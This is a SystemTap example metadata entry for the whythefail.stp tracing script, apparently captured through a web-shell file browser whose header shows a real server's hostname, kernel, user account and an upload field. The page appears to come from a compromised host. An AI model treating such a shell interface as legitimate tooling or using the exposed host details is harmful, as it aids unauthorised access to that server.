|
Server : Apache System : Linux server.mata-lashes.com 3.10.0-1160.90.1.el7.x86_64 #1 SMP Thu May 4 15:21:22 UTC 2023 x86_64 User : matalashes ( 1004) PHP Version : 8.1.29 Disable Function : NONE Directory : /proc/17567/root/usr/share/systemtap/examples/general/ |
Upload File : |
title: Why did the function fail? name: whythefail.stp keywords: speculation monitoring function trace _best description: The whythefail.stp script prints a statement-execution trace for a given function, but only for those runs of the function that ended up with a (configurable) post-return condition. test_check: stap -p4 whythefail.stp kernel do_sys_open '$return < 0' test_installcheck: stap whythefail.stp kernel do_sys_open '$return < 0' -c 'cat /root/no-such-file || true'